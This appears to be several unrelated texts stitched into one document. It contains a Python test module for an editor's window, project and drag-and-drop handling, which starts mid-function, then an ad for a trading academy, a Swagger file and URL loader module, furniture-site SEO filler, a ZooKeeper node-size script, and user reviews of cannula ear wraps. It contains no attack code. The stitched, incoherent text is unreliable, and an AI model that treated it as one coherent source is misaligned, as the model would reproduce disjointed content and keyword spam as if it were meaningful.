result = list(ed.iter_dropped_id_list(ids)) eq_(result, result_items) c = TestConfig(has_ids=True) ix = lambda id, found=True: TestConfig(id=id, found=found) yield test, c(has_ids=False) yield test, c(ids=[]) yield test, c(ids=[ix(0)]) yield test, c(ids=[ix(0), ix(1)]) yield test, c(ids=[ix(0, False)]) yield test, c(ids=[ix(0), ix(1, False)]) def test_iter_dropped_paths(): def doc(num, tmp): path = os.path.join(tmp, "doc%s.txt" % num) with open(path, mode="w") as fh: fh.write('doc') return path def sym(num, tmp): path = os.path.join(tmp, "doc%s.sym" % num) os.symlink(path + ".txt", path) return path def proj(num, tmp): path = os.path.join(tmp, "proj_%s" % num) os.mkdir(path) return path @test_app def test(app, c): m = Mocker() ed = Window(app) app = m.replace(ed, 'app') dc = m.mock(DocumentController) result_items = [] with tempdir() as tmp: if c.has_paths: paths = [] for it in c.paths: path = it.create(tmp) paths.append(path) if it.ignored: continue doc = app.document_with_path(path) \ >> m.mock(path, spec=TextDocument) result_items.append(doc) else: paths = None with m: result = list(ed.iter_dropped_paths(paths)) eq_(result, result_items) c = TestConfig(has_paths=True) def path(create, ignored=False, num=[0]): num[0] += 1 if create is None: return TestConfig(create=(lambda tmp: None), ignored=ignored) return TestConfig(create=partial(create, num[0]), ignored=ignored) yield test, c(has_paths=False) yield test, c(paths=[]) yield test, c(paths=[path(None)]) yield test, c(paths=[path(doc)]) yield test, c(paths=[path(sym)]) yield test, c(paths=[path(doc), path(sym), path(doc)]) yield test, c(paths=[path(proj, ignored=True)]) # yield test, c(paths=[path(proj)]) # yield test, c(paths=[path(proj), path(doc), path(proj)]) #yield test, c(paths=[path(proj, is_open=False)]) def test_insert_items(): def test(c): def get_parent_index(drop, offset=0): if any(v in '0123456789' for v in drop[0]): assert all(v in '0123456789' for v in drop[0]), drop return None, pindex return project, dindex + offset def namechar(item, seen=set()): name = test_app(app).name(item) name = name[len(type(item).__name__):] assert name.startswith(("(", "[", "<")), name assert name.endswith((")", "]", ">")), name name = name[1:-1] assert name not in seen, (item, name) seen.add(name) return name config = [] pindex = dindex = -1 project = None for i, char in enumerate(c.init + ' '): if char == "|": config.append("window") pindex = dindex = -1 continue if char == ' ': if i == c.drop[1]: offset = 1 if project is not None else 0 parent, index = get_parent_index(c.drop, offset) dindex = -1 continue if char == "*": config[-1] += "*" if i == c.drop[1]: raise ValueError("invalid drop index: {!r}".format(c.drop)) continue name = "({})".format(char) if char in '0123456789': item = project = "project" + name pindex += 1 else: item = "editor" + name dindex += 1 config.append(item) if i == c.drop[1]: parent, index = get_parent_index(c.drop) config = " ".join(config) print(config) with test_app(config) as app: name_to_item = {} for window in app.windows: for project in window.projects: char = namechar(project) project.name = char name_to_item[char] = project for editor in project.editors: char = namechar(editor) editor.document.file_path = char name_to_item[char] = editor for char in c.drop[0]: if char not in name_to_item and char not in '0123456789': name_to_item[char] = TextDocument(app, char) items = [name_to_item[char] for char in c.drop[0]] \ if "*" in c.final and c.init != c.final else [] window = app.windows[0] if "project" in c: eq_(c.drop[1], -1, "invalid test configuration; drop index " "must be -1 when project is specified") parent = c.project index = c.drop[1] if c.project == const.CURRENT: args = () elif c.project is None: args = (None,) else: args = (name_to_item[c.project],) else: if parent is None: project = window.get_current_project() if project is not None: parent = "project(%s)" % project.name if parent is not None: parent = name_to_item[parent[8:-1]] if index < 0: index = len(parent.editors) args = (parent, index, c.action) print('drop(%s) %s at %s of %s' % (c.action, c.drop[0], index, parent)) result = window.insert_items(items, *args) eq_(len(result), len(items)) final = ["window"] for char in c.final: if char == " ": continue if char == "|": final.append("window") continue if char == "*": final[-1] += "\\*" continue name = r"\({}\)".format(char) if char in "0123456789": if char not in c.init: name = r"\[.\]" final.append("project" + name) continue if char.isupper(): name = "\[{} .\]".format(char.lower()) final.append("editor" + name) final = "^" + " ".join(final) + "$" eq_(test_app(app).state, Regex(final, repr=final.replace("\\", ""))) def eq(a, b): msg = lambda:"{} != {}".format( test_app(app).name(a), test_app(app).name(b), ) eq_(a, b, msg) for window in app.windows: for project in window.projects: eq(project.window, window) for editor in project.editors: eq(editor.project, project) # number = project # letter in range a-f = document # letter in rnage A-F = new editor of document # space before project allows drop on project (insert at end) # pipe (|) delimits windows # so ' 0ab*c 1 2de| 3*fa' is... # window # project 0 # document a # document b (currently selected) # document c # project 1 # project 2 # document d # document e # window # project 3 (currently selected) # document f # document a # # drop=(<dropped item(s)>, <drop index in init>) config = TestConfig(init=' 0ab*c 1 2de') c = config(action=const.MOVE) yield test, c(drop=('', 0), final=' 0ab*c 1 2de') yield test, c(drop=('', 1), final=' 0ab*c 1 2de') yield test, c(drop=('', 2), final=' 0ab*c 1 2de') yield test, c(drop=('', 3), final=' 0ab*c 1 2de') yield test, c(drop=('', 5), final=' 0ab*c 1 2de') yield test, c(drop=('', 6), final=' 0ab*c 1 2de') yield test, c(drop=('', 7), final=' 0ab*c 1 2de') yield test, c(drop=('', 8), final=' 0ab*c 1 2de') yield test, c(drop=('', 9), final=' 0ab*c 1 2de') yield test, c(drop=('', 10), final=' 0ab*c 1 2de') yield test, c(drop=('', 11), final=' 0ab*c 1 2de') yield test, c(drop=('', 12), final=' 0ab*c 1 2de') yield test, c(drop=('a', 0), final=' 0bca* 1 2de') yield test, c(drop=('a', 1), final=' 0bca* 1 2de') yield test, c(drop=('a', 2), final=' 0ab*c 1 2de') yield test, c(drop=('a', 3), final=' 0ab*c 1 2de') yield test, c(drop=('a', 5), final=' 0ba*c 1 2de') yield test, c(drop=('a', 6), final=' 0bca* 1 2de') yield test, c(drop=('a', 7), final=' 0bc 1a* 2de') yield test, c(drop=('a', 8), final=' 0bc 1a* 2de') yield test, c(drop=('a', 9), final=' 0bc 1 2dea*') yield test, c(drop=('a', 10), final=' 0bc 1 2a*de') yield test, c(drop=('a', 11), final=' 0bc 1 2da*e') yield test, c(drop=('a', 12), final=' 0bc 1 2dea*') yield test, c(drop=('f', 0), final=' 0abcF* 1 2de') yield test, c(drop=('f', 1), final=' 0abcF* 1 2de') yield test, c(drop=('f', 2), final=' 0F*abc 1 2de') yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de') yield test, c(drop=('f', 5), final=' 0abF*c 1 2de') yield test, c(drop=('f', 6), final=' 0abcF* 1 2de') yield test, c(drop=('f', 7), final=' 0abc 1F* 2de') yield test, c(drop=('f', 8), final=' 0abc 1F* 2de') yield test, c(drop=('f', 9), final=' 0abc 1 2deF*') yield test, c(drop=('f', 10), final=' 0abc 1 2F*de') yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e') yield test, c(drop=('f', 12), final=' 0abc 1 2deF*') yield test, c(drop=('2', 0), final=' 0abc 1 2*de') yield test, c(drop=('2', 1), final=' 2*de 0abc 1') yield test, c(drop=('2', 2), final=' 2*de 0abc 1') yield test, c(drop=('2', 3), final=' 2*de 0abc 1') yield test, c(drop=('2', 5), final=' 2*de 0abc 1') yield test, c(drop=('2', 6), final=' 2*de 0abc 1') yield test, c(drop=('2', 7), final=' 0abc 2*de 1') yield test, c(drop=('2', 8), final=' 0abc 2*de 1') yield test, c(drop=('2', 9), final=' 0ab*c 1 2de') yield test, c(drop=('2', 10), final=' 0ab*c 1 2de') yield test, c(drop=('2', 11), final=' 0ab*c 1 2de') yield test, c(drop=('2', 12), final=' 0ab*c 1 2de') c = config(action=const.COPY) yield test, c(drop=('', 0), final=' 0ab*c 1 2de') yield test, c(drop=('', 1), final=' 0ab*c 1 2de') yield test, c(drop=('', 2), final=' 0ab*c 1 2de') yield test, c(drop=('', 3), final=' 0ab*c 1 2de') yield test, c(drop=('', 5), final=' 0ab*c 1 2de') yield test, c(drop=('', 6), final=' 0ab*c 1 2de') yield test, c(drop=('', 7), final=' 0ab*c 1 2de') yield test, c(drop=('', 8), final=' 0ab*c 1 2de') yield test, c(drop=('', 9), final=' 0ab*c 1 2de') yield test, c(drop=('', 10), final=' 0ab*c 1 2de') yield test, c(drop=('', 11), final=' 0ab*c 1 2de') yield test, c(drop=('', 12), final=' 0ab*c 1 2de') yield test, c(drop=('a', 0), final=' 0abcA* 1 2de') yield test, c(drop=('a', 1), final=' 0abcA* 1 2de') yield test, c(drop=('a', 2), final=' 0A*abc 1 2de') yield test, c(drop=('a', 3), final=' 0aA*bc 1 2de') yield test, c(drop=('a', 5), final=' 0abA*c 1 2de') yield test, c(drop=('a', 6), final=' 0abcA* 1 2de') yield test, c(drop=('a', 7), final=' 0abc 1A* 2de') yield test, c(drop=('a', 8), final=' 0abc 1A* 2de') yield test, c(drop=('a', 9), final=' 0abc 1 2deA*') yield test, c(drop=('a', 10), final=' 0abc 1 2A*de') yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e') yield test, c(drop=('a', 12), final=' 0abc 1 2deA*') c = config(action=None) yield test, c(drop=('', 0), final=' 0ab*c 1 2de') yield test, c(drop=('', 1), final=' 0ab*c 1 2de') yield test, c(drop=('', 2), final=' 0ab*c 1 2de') yield test, c(drop=('', 3), final=' 0ab*c 1 2de') yield test, c(drop=('', 5), final=' 0ab*c 1 2de') yield test, c(drop=('', 6), final=' 0ab*c 1 2de') yield test, c(drop=('', 7), final=' 0ab*c 1 2de') yield test, c(drop=('', 8), final=' 0ab*c 1 2de') yield test, c(drop=('', 9), final=' 0ab*c 1 2de') yield test, c(drop=('', 10), final=' 0ab*c 1 2de') yield test, c(drop=('', 11), final=' 0ab*c 1 2de') yield test, c(drop=('', 12), final=' 0ab*c 1 2de') yield test, c(drop=('a', 0), final=' 0a*bc 1 2de') yield test, c(drop=('a', 1), final=' 0a*bc 1 2de') yield test, c(drop=('a', 2), final=' 0a*bc 1 2de') yield test, c(drop=('a', 3), final=' 0a*bc 1 2de') yield test, c(drop=('a', 5), final=' 0a*bc 1 2de') yield test, c(drop=('a', 6), final=' 0a*bc 1 2de') yield test, c(drop=('a', 7), final=' 0abc 1A* 2de') yield test, c(drop=('a', 8), final=' 0abc 1A* 2de') yield test, c(drop=('a', 9), final=' 0abc 1 2deA*') yield test, c(drop=('a', 10), final=' 0abc 1 2A*de') yield test, c(drop=('a', 11), final=' 0abc 1 2dA*e') yield test, c(drop=('a', 12), final=' 0abc 1 2deA*') yield test, c(drop=('f', 0), final=' 0abcF* 1 2de') yield test, c(drop=('f', 1), final=' 0abcF* 1 2de') yield test, c(drop=('f', 2), final=' 0F*abc 1 2de') yield test, c(drop=('f', 3), final=' 0aF*bc 1 2de') yield test, c(drop=('f', 5), final=' 0abF*c 1 2de') yield test, c(drop=('f', 6), final=' 0abcF* 1 2de') yield test, c(drop=('f', 7), final=' 0abc 1F* 2de') yield test, c(drop=('f', 8), final=' 0abc 1F* 2de') yield test, c(drop=('f', 9), final=' 0abc 1 2deF*') yield test, c(drop=('f', 10), final=' 0abc 1 2F*de') yield test, c(drop=('f', 11), final=' 0abc 1 2dF*e') yield test, c(drop=('f', 12), final=' 0abc 1 2deF*') # cannot copy project yet # yield test, c(drop=('2', 0), final=' 0abc 1 2de') # yield test, c(drop=('2', 1), final=' 2de 0abc 1') # yield test, c(drop=('2', 2), final=' 2de 0abc 1') # yield test, c(drop=('2', 3), final=' 2de 0abc 1') # yield test, c(drop=('2', 4), final=' 2de 0abc 1') # yield test, c(drop=('2', 5), final=' 2de 0abc 1') # yield test, c(drop=('2', 6), final=' 0abc 2de 1') # yield test, c(drop=('2', 7), final=' 0abc 2de 1') # yield test, c(drop=('2', 8), final=' 0abc 1 2de') # yield test, c(drop=('2', 9), final=' 0abc 1 2de') # yield test, c(drop=('2', 10), final=' 0abc 1 2de') # yield test, c(drop=('2', 11), final=' 0abc 1 2de') c = config(action=None, init=' 0ab*c 1 2de') yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=const.CURRENT) yield test, c(drop=('a', -1), final=' 0a*bc 1 2de', project=None) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2') c = config(action=None, init=' 0abc 1* 2de') yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=const.CURRENT) yield test, c(drop=('a', -1), final=' 0abc 1A* 2de', project=None) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2') c = config(action=None, init=' 0abc 1 2de*') yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=const.CURRENT) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project=None) yield test, c(drop=('a', -1), final=' 0abc 1 2deA*', project='2') c = config(init=' 0a | 1bc', action=const.MOVE) yield test, c(drop=('b', 1), final=' 0ab* | 1c*') yield test, c(drop=('b', 2), final=' 0b*a | 1c*') yield test, c(drop=('1', 0), final=' 0a 1*bc |') yield test, c(drop=('1', 1), final=' 1*bc 0a |') # TODO implement move # c = config(init=' 0a* | 1b*c', action=const.MOVE) # yield test, c(drop=('b', 1), final=' 0ab* | 1c*') # yield test, c(drop=('b', 2), final=' 0b*a | 1c*') # # yield test, c(drop=('1', 0), final=' 0a 1b*c |') # yield test, c(drop=('1', 1), final=' 1b*c 0a |') #yield test, c(drop=('a', 6), final=' 0 | 1bca*') # should fail (item inserted in wrong window) def test_undo_manager(): @gentest def test(config, has_doc=True, check_editor=True): with test_app(config) as app: window = app.windows[0] result = window.undo_manager if has_doc: eq_(result, window.current_editor.undo_manager) else: eq_(result, window.no_document_undo_manager) if check_editor: eq_(window.current_editor, None) yield test("window", has_doc=False) yield test("window project", has_doc=False) yield test("window project* editor") yield test("window project editor* editor") yield test("window project editor editor*")
Algowire Trading Academy offers support to its candidates who seek new opportunities in the world of financial markets. Our courses have been designed by keeping in mind the requirements of employers and are idle for working professionals and students. Our Career Services are available to our candidates throughout their professional career even after they have completed the course with us. Arbitrage Trader/Algo Trader - Algo traders participate in equity markets and use various strategies to earn consistent returns. They usually work on proprietary desk of stock brokers. Algorithmic trading not only requires exposure to financial markets but also understanding of software used to execute the chosen strategy. Algorithmic trading is a very lucrative and high-paying job in the financial sector and with growth of algorithmic trading in Indian markets there is lot of demand for right candidates who are able to acquire relevant skills. Derivative analyst/Market risk analyst - Candidates with exposure to various hedging strategies also have requirement from various trading house to develop in-house strategies for proprietary trading or client advisory. Relationship Manager/Advisor - Relationship manager advice client to earn profits via trading in equity market. With the increase in retail participation in equity markets relationship managers with exposure to financial markets are in great demand. Risk Management/Compliance - Compliance officers usually work in the back-office operations for stock brokers and other financial market participants. They are entrusted upon with the task of managing operations within the domain of compliance practices.
from __future__ import absolute_import from .consts import private from .utils import patch_path import json import yaml import six import os import logging import re logger = logging.getLogger(__name__) class Getter(six.Iterator): """ base of getter object Idealy, to subclass a getter, you just need to override load function. The part to extend getter would be finalized once Swagger 2.0 is ready. """ def __init__(self, path): self.base_path = path def __iter__(self): return self def __next__(self): if len(self.urls) == 0: raise StopIteration obj = self.load(self.urls.pop(0)) # make sure data is string type if isinstance(obj, dict): pass elif isinstance(obj, six.binary_type): obj = obj.decode('utf-8') elif not isinstance(obj, six.string_types): raise ValueError('Unknown types: [{0}]'.format(str(type(obj)))) # a very simple logic to distinguish json and yaml if isinstance(obj, six.string_types): try: if obj.startswith('{'): obj = json.loads(obj) else: obj = yaml.load(obj) except ValueError: raise Exception('Unknown format startswith {0} ...'.format(obj[:10])) return obj def load(self, path): """ load the resource, and return for parsing. :return: name and json object of resources :rtype: (str, dict) """ raise NotImplementedError() class LocalGetter(Getter): """ default getter implmenetation for local resource file """ def __init__(self, path): super(LocalGetter, self).__init__(path) if path.startswith('file://'): parsed = six.moves.urllib.parse.urlparse(path) path = parsed.path if re.match('^/[A-Z]+:', path) is not None: path = os.path.abspath(path[1:]) for n in private.SWAGGER_FILE_NAMES: if self.base_path.endswith(n): self.base_path = os.path.dirname(self.base_path) self.urls = [path] break else: p = os.path.join(path, n) if os.path.isfile(p): self.urls = [p] break else: # there is no file matched predefined file name: # - resource_list.json (1.2) # - swagger.json (2.0) # in this case, we will locate them in this way: # - when 'path' points to a specific file, and its # extension is either 'json' or 'yaml'. _, ext = os.path.splitext(path) for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]: if ext.endswith(e): self.base_path = os.path.dirname(path) self.urls = [path] break else: for e in [private.FILE_EXT_JSON, private.FILE_EXT_YAML, private.FILE_EXT_YML]: #print(path + '.' + e) if os.path.isfile(path + '.' + e): self.urls = [path + '.' + e] break else: raise ValueError('Unable to locate resource file: [{0}]'.format(path)) def load(self, path): logger.info('to load: [{0}]'.format(path)) path = patch_path(self.base_path, path) logger.info('final path to load: [{0}]'.format(path)) ret = None with open(path, 'r') as f: ret = f.read() return ret class SimpleGetter(Getter): """ the simple getter that don't have to concern file loading of LocalGetter """ __simple_getter_callback__ = lambda url: {} """ the callback to load the resource, accept an URL and return a string buffer """ def __init__(self, path): if isinstance(path, six.string_types): super(SimpleGetter, self).__init__(path) if self.base_path.endswith('/'): self.base_path = self.base_path[:-1] self.urls = [path] else: raise Exception('Unsupported type for "path": {} in SimpleGetter'.format(str(type(path)))) def load(self, path): logger.info('to load: [{0}]'.format(path)) return self.__simple_getter_callback__.__func__(path) def _url_load(path): ret = f = None try: f = six.moves.urllib.request.urlopen(path) ret = f.read() finally: if f: f.close() return ret class UrlGetter(SimpleGetter): """ default getter implementation for remote resource file """ __simple_getter_callback__ = _url_load class DictGetter(Getter): """ a getter accept a dict as parameter without loading from file / url args: - urls: the urls to be loaded in upcoming resolving (the order should be matched to get result correct) - path2dict: a mapping from 'path' to 'dict', which is the mocking of 'downloaded data' """ def __init__(self, urls, path2dict): super(DictGetter, self).__init__(urls[0]) self.urls = urls self._path2dict = path2dict or {} def load(self, path): logger.info('to load: [{0}]'.format(path)) return self._path2dict.get(path, {})
Lionsstar Möbel article is the best inspiration for home interior posted about Haus möbel. This Lionsstar Möbel was posted in category Haus möbel as ideas for inspiration to Remodel your Haus möbel accessories. This article can be your reference when you are confused to choose the right decoration for your home accessories. This Lionsstar Möbel maybe your best option to decoring because having a home with our own design is everyone's dream. We hope by posting this Lionsstar Möbel ideas, we can fulfill your needs of inspiration for designing your accessories Haus möbel. If you need more ideas to design a home & interior accessories, you can check at our collection right below this post. Also, don't forget to always visit 21stcenturyfluency.com to find some new and fresh posts about Haus möbel and other Inspiration everyday. ) photos, please kindly follow us on tweets, path, Instagram and google plus, or you mark this page on book mark area, We try to provide you with up grade regularly with fresh and new pics, enjoy your exploring, and find the perfect for you.
#cat get_size.py # -*- coding: utf-8 -*- """遍历指定路径下所有节点的大小""" from kazoo.client import KazooClient,KazooState import socket,sys, os, time, atexit class dzk: def __init__(self,hosts,secs): self.hosts = hosts #self.zk = KazooClient(hosts='1.1.1.3:2181,1.1.1.2:2181,1.1.1.1:2181',retry_max_delay=2000) self.zk = KazooClient(hosts=self.hosts) try: self.zk.start() self.zk.add_listener(self.listener) except Exception,e: print "ERROR connect LOST ==============>" def listener(state): if state == KazooState.LOST: self.zk.start() elif state == KazooState.SUSPENDED: print "*******listener saw KazooState.LOST" else: print "*******listener saw KazooState.CONNECT" def get_child(self,paths): aa = self.zk.get_children(paths) return aa def getData(self,paths): xx = self.zk.get(paths) return xx[1][8] def bianli(self,rootDir): for i in self.get_child(rootDir): if i: i = rootDir + "/" + i #if self.getData(i) > 1048570: print i,"---->",self.getData(i) self.bianli(i) if __name__ == "__main__": zzk = dzk("1.1.1.1:2181",2000) #zzk.get_child() #zzk.getData() zzk.bianli("/")
To keep cushions in place and be able to reuse them, put a strip of double-sided tape inside cushions before attaching to cannula. I was putting a drop of glue inside cushion, but, then, you must throw away cushion with each cannula. I only use them as needed to save buying so many. I use surgi-strips to keep them in place on the ends and in the middle. I am a caregiver for an 86 year old gentleman who is on hospice care. They were furnishing these tubes originally and just discontinued them when the company was sold. Darn my luck. Ear savers. Couldn't sleep with out them. Looking for ways to keep them from coming off. I use a set on each side so I don't wake up with track marks on my cheeks. Helpful to read other reviews. EZ-wrap makes it possible for me to sleep with a cannula on. They would be fine if they would stay attached to the tubing. Wraps won't stay on the cannula tubing without some adhesive being applied to the slit surfaces. They are better than nothing but have to be retroffitted for them to stay on the tubing or they fall off if you move your head. The manufacturer should put a double stick tape strip with a pull off tab so they stick together after being attached to the cannula tubing. I have found they will stay in place by attaching each piece to the tubing and then spreading some glue from a glue stick on both pieces (flat toothpick works good) and squeeze them together for a minute or so and then wipe the excess off. This will put some glue on both surfaces and the tubing to keep the wrap from twisting. Make sure the slit is on top. Wait an hour or so before using them. Before you attach the wrap to the tubing, mark the tubing at the front of the ear so you will know where to place the wrap. I change my cannula monthly and the wraps still look good but I'm not sure how sanitary they might be. I have tried the thread solution but with arthritis in my fingers, I can't tie them tight enough to keep them from moving. Best product I've found for ear protection. The only problem I've had is trying to keep the wraps on the cannula. I've ended up wrapping them with thread after I put them in place. and this seems to really place. They may not be perfect, but they certainly help and I'm glad I found this product. The idea is OK, but they just do not stay in place. More trouble than they are worth. I have arthritis and I used these as ring sizers they are comfortable and allows my rings to fit over my knuckles then softly protects my skin where the rings sit.